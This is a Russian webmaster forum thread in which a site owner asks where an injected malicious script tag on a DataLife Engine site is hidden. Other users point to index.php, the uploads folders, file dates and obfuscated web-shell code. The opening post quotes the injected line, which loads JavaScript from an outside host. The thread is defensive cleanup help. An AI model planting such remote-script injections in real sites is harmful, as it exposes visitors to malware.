X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Вредоносный код, яндекс послал сайт далеко
ramazanaman
ramazanaman
Topic Starter сообщение 28.7.2012, 5:56; Ответить: ramazanaman
Сообщение #1


Вот сайт http://kon7ert.ru/, в самом конце код

<script src="http://linuxme.gotdns.org/rss.js"></script> и ниже есчо на эту же страницу. Владелец подцепил говорит на однокластниках. Движок дле, я облазил все файлы темы нет такого урла там. Где может этот долбанный код быть?
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
whitesunset
whitesunset
сообщение 28.7.2012, 6:10; Ответить: whitesunset
Сообщение #2


Совершенно не знаком с DLE, но логично было бы искать после "<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->"
Если на сайт залит шелл, то функция вставки вредоносной строки скорее всего обфусцирована, и по прямому поиску вы ее вряд ли найдете.

Сообщение отредактировал whitesunset - 28.7.2012, 6:11


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ramazanaman
ramazanaman
Topic Starter сообщение 28.7.2012, 6:22; Ответить: ramazanaman
Сообщение #3


(whitesunset @ 28.7.2012, 5:10) *
Совершенно не знаком с DLE, но логично было бы искать после "<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->"
Если на сайт залит шелл, то функция вставки вредоносной строки скорее всего обфусцирована, и по прямому поиску вы ее вряд ли найдете.


Я же написал что искал. Я спрашивал знакомого, тоже говорит через функции. Но в какой папке может быть этот файл хрен его знает.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 28.7.2012, 8:58; Ответить: install
Сообщение #4


Ищите в папках uploads, files обычно название файла левое и ни каким образом не относится к движку.
По дате изменения посмотрите, когда и какие файлы были изменены.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
djalin
djalin
сообщение 28.7.2012, 17:34; Ответить: djalin
Сообщение #5




собственно вот он

а банально індекс или ядро движка?

Сообщение отредактировал djalin - 28.7.2012, 17:35


--------------------
Услуги: установка WP + плагины. Установка SAPE: wordpress/phpbb/Quick.Cms/некоторые самописы (php)
Хостинг - The HostVille
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ramazanaman
ramazanaman
Topic Starter сообщение 28.7.2012, 21:05; Ответить: ramazanaman
Сообщение #6


(djalin @ 28.7.2012, 16:34) *


собственно вот он

а банально індекс или ядро движка?


Непонял вопроса честно говоря.

Я с кодом работать усею и исходник смотреть тем более evrika.gif . Все файлы темы проверил и ее там нет просто. Значит он в другой папке, а там до хрена папок которые я уже перелазил и есть JS и вот незнаю где именно находится функция вызова.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
elvis81
elvis81
сообщение 28.7.2012, 23:43; Ответить: elvis81
Сообщение #7


ramazanaman, не хотелось бы Вас обижать, но всё же.
Посмотрите файл index.php в самом низу после
echo "\n<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->\r\n";

не должно быть ничего кроме
GzipOut ();
?>


Если стоят непонятные символы закодированные, то можете их удалять.


--------------------
ТИц поднимают, поднималкой для ТИца
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ramazanaman
ramazanaman
Topic Starter сообщение 29.7.2012, 14:05; Ответить: ramazanaman
Сообщение #8


А вот индекс я не проверил кстати. Только майн и другие файлы темы. Сейчас проверю и напишу что да как.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ole4901
ole4901
сообщение 30.7.2012, 12:15; Ответить: ole4901
Сообщение #9


Частенько в шаблоны вшивают вредоносный код.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
airman
airman
сообщение 30.7.2012, 14:26; Ответить: airman
Сообщение #10


раз код убрали - пишите платонам, сайт должны вернуть


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Почистить код на сайте
1 Timka 1090 2.1.2021, 1:13
автор: 0pium
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыВы мне код, я вам как - делать не надо.
0 fedornabilkin 942 18.9.2020, 18:59
автор: fedornabilkin
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыAdobe muse: Не могу разместить нужный мне код сразу после Body
0 Evg82 3829 20.6.2020, 10:24
автор: Evg82
Открытая тема (нет новых ответов) Повесить мой код Адсенса на ваш сайт на 1-2 дня
4 WildWeb8 3700 18.7.2018, 20:04
автор: startseo
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыНужен человек, который почистит код от ненужного мусора. (Вордпресс)
51 timkab_mw 6813 2.8.2017, 12:01
автор: timkab_mw


 



RSS Текстовая версия Сейчас: 29.3.2024, 16:41
Дизайн